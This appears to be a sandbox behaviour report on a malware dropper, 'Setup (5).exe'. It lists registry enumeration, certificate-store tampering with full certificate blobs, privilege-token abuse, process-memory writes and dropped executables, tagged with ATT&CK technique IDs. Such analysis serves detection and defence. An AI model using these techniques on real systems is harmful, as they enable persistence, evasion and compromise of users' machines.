Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	Esplorarne.exe.com
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Esplorarne.exe.com
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	Esplorarne.exe.com
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Esplorarne.exe.com
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Esplorarne.exe.com
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	Esplorarne.exe.com
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	Esplorarne.exe.com
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe

Enumerates system info in registry 2 TTPs 30 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	Esplorarne.exe.com
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	Esplorarne.exe.com
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	Esplorarne.exe.com
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	Esplorarne.exe.com
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	Esplorarne.exe.com
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	Esplorarne.exe.com
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
3348	taskkill.exe
1736	taskkill.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	Esplorarne.exe.com
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E	Esplorarne.exe.com
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache	Esplorarne.exe.com

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC	Esplorarne.exe.com
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be	Esplorarne.exe.com
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA	Esplorarne.exe.com
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f	Esplorarne.exe.com

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
6768	PING.EXE

Script User-Agent 7 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	99	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	104	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	133	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	136	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	143	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	233	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	238	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5116	Setup (5).exe
5116	Setup (5).exe
4744	WerFault.exe
4744	WerFault.exe
3392	WerFault.exe
3392	WerFault.exe
2932	WerFault.exe
2932	WerFault.exe
2528	WerFault.exe
2528	WerFault.exe
1288	WerFault.exe
1288	WerFault.exe
3628	WerFault.exe
3628	WerFault.exe
5756	Esplorarne.exe.com
5756	Esplorarne.exe.com
5292	xtect12.exe
5292	xtect12.exe
5292	xtect12.exe
5292	xtect12.exe
5292	xtect12.exe
5292	xtect12.exe
5292	xtect12.exe
5292	xtect12.exe
5292	xtect12.exe
5292	xtect12.exe
5292	xtect12.exe
5292	xtect12.exe
5292	xtect12.exe
5292	xtect12.exe
5292	xtect12.exe
5292	xtect12.exe
5292	xtect12.exe
5292	xtect12.exe
5292	xtect12.exe
5292	xtect12.exe
5292	xtect12.exe
5292	xtect12.exe
5292	xtect12.exe
5292	xtect12.exe
5292	xtect12.exe
5292	xtect12.exe
5292	xtect12.exe
5292	xtect12.exe
5292	xtect12.exe
5292	xtect12.exe
5292	xtect12.exe
5292	xtect12.exe
5292	xtect12.exe
5292	xtect12.exe
5292	xtect12.exe
5292	xtect12.exe
5292	xtect12.exe
5292	xtect12.exe
5000	NGSx7_M3OHWSeBxQFu9pEcYE.exe
5000	NGSx7_M3OHWSeBxQFu9pEcYE.exe
4804	t7Xvr_mcY4U0EgrksDdHs2hI.exe
4804	t7Xvr_mcY4U0EgrksDdHs2hI.exe
3272	pIQ3ulIMRDHkTcxzXZA50m3y.exe
3272	pIQ3ulIMRDHkTcxzXZA50m3y.exe
3060	gwyroycDer67hXuPDw56Y8dx.exe
3060	gwyroycDer67hXuPDw56Y8dx.exe
4676	msedge.exe
4676	msedge.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
6852	A2MeOTLlVVy7eGu_Qu_gdUsq.exe

Suspicious behavior: SetClipboardViewer 2 IoCs

pid	Process
5912	7773517.exe
2212	7514811.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5036	bp6rLacE0rY6LNrjOO_TxmEr.exe
Token: SeRestorePrivilege	4744	WerFault.exe
Token: SeBackupPrivilege	4744	WerFault.exe
Token: SeDebugPrivilege	4676	4175631.exe
Token: SeDebugPrivilege	3852	GaGn0YZ1Xn4dsxDCBdKU27Z4.exe
Token: SeDebugPrivilege	3348	taskkill.exe
Token: SeDebugPrivilege	3060	gwyroycDer67hXuPDw56Y8dx.exe
Token: SeDebugPrivilege	3272	pIQ3ulIMRDHkTcxzXZA50m3y.exe
Token: SeDebugPrivilege	5000	NGSx7_M3OHWSeBxQFu9pEcYE.exe
Token: SeDebugPrivilege	2344	4TxEGrcFaLMUzJf7EnXhU_B_.exe
Token: SeDebugPrivilege	4804	t7Xvr_mcY4U0EgrksDdHs2hI.exe
Token: SeDebugPrivilege	4720	1480338.exe
Token: SeCreateTokenPrivilege	4996	askinstall53.exe
Token: SeAssignPrimaryTokenPrivilege	4996	askinstall53.exe
Token: SeLockMemoryPrivilege	4996	askinstall53.exe
Token: SeIncreaseQuotaPrivilege	4996	askinstall53.exe
Token: SeMachineAccountPrivilege	4996	askinstall53.exe
Token: SeTcbPrivilege	4996	askinstall53.exe
Token: SeSecurityPrivilege	4996	askinstall53.exe
Token: SeTakeOwnershipPrivilege	4996	askinstall53.exe
Token: SeLoadDriverPrivilege	4996	askinstall53.exe
Token: SeSystemProfilePrivilege	4996	askinstall53.exe
Token: SeSystemtimePrivilege	4996	askinstall53.exe
Token: SeProfSingleProcessPrivilege	4996	askinstall53.exe
Token: SeIncBasePriorityPrivilege	4996	askinstall53.exe
Token: SeCreatePagefilePrivilege	4996	askinstall53.exe
Token: SeCreatePermanentPrivilege	4996	askinstall53.exe
Token: SeBackupPrivilege	4996	askinstall53.exe
Token: SeRestorePrivilege	4996	askinstall53.exe
Token: SeShutdownPrivilege	4996	askinstall53.exe
Token: SeDebugPrivilege	4996	askinstall53.exe
Token: SeAuditPrivilege	4996	askinstall53.exe
Token: SeSystemEnvironmentPrivilege	4996	askinstall53.exe
Token: SeChangeNotifyPrivilege	4996	askinstall53.exe
Token: SeRemoteShutdownPrivilege	4996	askinstall53.exe
Token: SeUndockPrivilege	4996	askinstall53.exe
Token: SeSyncAgentPrivilege	4996	askinstall53.exe
Token: SeEnableDelegationPrivilege	4996	askinstall53.exe
Token: SeManageVolumePrivilege	4996	askinstall53.exe
Token: SeImpersonatePrivilege	4996	askinstall53.exe
Token: SeCreateGlobalPrivilege	4996	askinstall53.exe
Token: 31	4996	askinstall53.exe
Token: 32	4996	askinstall53.exe
Token: 33	4996	askinstall53.exe
Token: 34	4996	askinstall53.exe
Token: 35	4996	askinstall53.exe
Token: SeDebugPrivilege	2800	5632698.exe
Token: SeDebugPrivilege	4456	Cleaner.exe
Token: SeDebugPrivilege	1184	LivelyScreenRecS1.9.exe
Token: SeDebugPrivilege	5584	6961886.exe
Token: SeDebugPrivilege	5564	3010462.exe
Token: SeDebugPrivilege	1676	tvwYgrb2f429aQuOGro1rbsa.exe
Token: SeDebugPrivilege	1736	taskkill.exe
Token: SeDebugPrivilege	4040	1029648.exe
Token: SeDebugPrivilege	5432	1309205.exe
Token: SeSecurityPrivilege	7164	msiexec.exe
Token: SeCreateTokenPrivilege	3604	Cleaner Installation.exe
Token: SeAssignPrimaryTokenPrivilege	3604	Cleaner Installation.exe
Token: SeLockMemoryPrivilege	3604	Cleaner Installation.exe
Token: SeIncreaseQuotaPrivilege	3604	Cleaner Installation.exe
Token: SeMachineAccountPrivilege	3604	Cleaner Installation.exe
Token: SeTcbPrivilege	3604	Cleaner Installation.exe
Token: SeSecurityPrivilege	3604	Cleaner Installation.exe
Token: SeTakeOwnershipPrivilege	3604	Cleaner Installation.exe

Suspicious use of FindShellTrayWindow 63 IoCs

pid	Process
3108	DpLRG_KNuUytQZuMpgd6PuVG.tmp
3604	Cleaner Installation.exe
3872	Inlog.tmp
4644	VPN.tmp
3736	WEATHER Manager.tmp
6212	Conhost.exe
7012	msedge.exe
6984	GameBoxWin64.exe
7420	Setup.tmp
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
5348	Esplorarne.exe.com
5348	Esplorarne.exe.com
5348	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
5348	Esplorarne.exe.com
5348	Esplorarne.exe.com
5348	Esplorarne.exe.com

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5116 wrote to memory of 2988	5116	Setup (5).exe	88
PID 5116 wrote to memory of 2988	5116	Setup (5).exe	88
PID 5116 wrote to memory of 2988	5116	Setup (5).exe	88
PID 5116 wrote to memory of 5036	5116	Setup (5).exe	86
PID 5116 wrote to memory of 5036	5116	Setup (5).exe	86
PID 5116 wrote to memory of 3060	5116	Setup (5).exe	87
PID 5116 wrote to memory of 3060	5116	Setup (5).exe	87
PID 5116 wrote to memory of 3060	5116	Setup (5).exe	87
PID 5116 wrote to memory of 3852	5116	Setup (5).exe	85
PID 5116 wrote to memory of 3852	5116	Setup (5).exe	85
PID 5116 wrote to memory of 3852	5116	Setup (5).exe	85
PID 5116 wrote to memory of 4568	5116	Setup (5).exe	84
PID 5116 wrote to memory of 4568	5116	Setup (5).exe	84
PID 5116 wrote to memory of 4568	5116	Setup (5).exe	84
PID 5116 wrote to memory of 4584	5116	Setup (5).exe	83
PID 5116 wrote to memory of 4584	5116	Setup (5).exe	83
PID 5116 wrote to memory of 4584	5116	Setup (5).exe	83
PID 5116 wrote to memory of 4576	5116	Setup (5).exe	82
PID 5116 wrote to memory of 4576	5116	Setup (5).exe	82
PID 5116 wrote to memory of 4576	5116	Setup (5).exe	82
PID 5116 wrote to memory of 4560	5116	Setup (5).exe	81
PID 5116 wrote to memory of 4560	5116	Setup (5).exe	81
PID 5116 wrote to memory of 4560	5116	Setup (5).exe	81
PID 5116 wrote to memory of 2464	5116	Setup (5).exe	80
PID 5116 wrote to memory of 2464	5116	Setup (5).exe	80
PID 5116 wrote to memory of 2464	5116	Setup (5).exe	80
PID 5116 wrote to memory of 2344	5116	Setup (5).exe	89
PID 5116 wrote to memory of 2344	5116	Setup (5).exe	89
PID 5116 wrote to memory of 2344	5116	Setup (5).exe	89
PID 5116 wrote to memory of 3896	5116	Setup (5).exe	95
PID 5116 wrote to memory of 3896	5116	Setup (5).exe	95
PID 5116 wrote to memory of 3896	5116	Setup (5).exe	95
PID 5116 wrote to memory of 3104	5116	Setup (5).exe	93
PID 5116 wrote to memory of 3104	5116	Setup (5).exe	93
PID 5116 wrote to memory of 3104	5116	Setup (5).exe	93
PID 5116 wrote to memory of 3684	5116	Setup (5).exe	90
PID 5116 wrote to memory of 3684	5116	Setup (5).exe	90
PID 5116 wrote to memory of 3684	5116	Setup (5).exe	90
PID 5116 wrote to memory of 4984	5116	Setup (5).exe	103
PID 5116 wrote to memory of 4984	5116	Setup (5).exe	103
PID 5116 wrote to memory of 4984	5116	Setup (5).exe	103
PID 5116 wrote to memory of 1888	5116	Setup (5).exe	101
PID 5116 wrote to memory of 1888	5116	Setup (5).exe	101
PID 5116 wrote to memory of 1888	5116	Setup (5).exe	101
PID 5116 wrote to memory of 3272	5116	Setup (5).exe	100
PID 5116 wrote to memory of 3272	5116	Setup (5).exe	100
PID 5116 wrote to memory of 3272	5116	Setup (5).exe	100
PID 5116 wrote to memory of 968	5116	Setup (5).exe	104
PID 5116 wrote to memory of 968	5116	Setup (5).exe	104
PID 5116 wrote to memory of 968	5116	Setup (5).exe	104
PID 4984 wrote to memory of 1624	4984	zT7lzmRyAz5Sh_dhGoZkPLf_.exe	106
PID 4984 wrote to memory of 1624	4984	zT7lzmRyAz5Sh_dhGoZkPLf_.exe	106
PID 4984 wrote to memory of 1624	4984	zT7lzmRyAz5Sh_dhGoZkPLf_.exe	106
PID 1888 wrote to memory of 3696	1888	6dBlR9ES_h9uZiKUQGcURO6C.exe	107
PID 1888 wrote to memory of 3696	1888	6dBlR9ES_h9uZiKUQGcURO6C.exe	107
PID 1888 wrote to memory of 3696	1888	6dBlR9ES_h9uZiKUQGcURO6C.exe	107
PID 5116 wrote to memory of 1068	5116	Setup (5).exe	109
PID 5116 wrote to memory of 1068	5116	Setup (5).exe	109
PID 5116 wrote to memory of 1068	5116	Setup (5).exe	109
PID 1888 wrote to memory of 2256	1888	6dBlR9ES_h9uZiKUQGcURO6C.exe	110
PID 1888 wrote to memory of 2256	1888	6dBlR9ES_h9uZiKUQGcURO6C.exe	110
PID 1888 wrote to memory of 2256	1888	6dBlR9ES_h9uZiKUQGcURO6C.exe	110
PID 2988 wrote to memory of 3396	2988	O5TjB46UfglGUEdrVFJnqcV8.exe	111
PID 2988 wrote to memory of 3396	2988	O5TjB46UfglGUEdrVFJnqcV8.exe	111

C:\Users\Admin\AppData\Local\Temp\Setup (5).exe
"C:\Users\Admin\AppData\Local\Temp\Setup (5).exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5116
- C:\Users\Admin\Documents\DeXoDhHO4fs8ErAGxqZ46K2p.exe
  "C:\Users\Admin\Documents\DeXoDhHO4fs8ErAGxqZ46K2p.exe"
  2⤵
  - Executes dropped EXE
  PID:2464
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2464 -s 292
    3⤵
    - Program crash
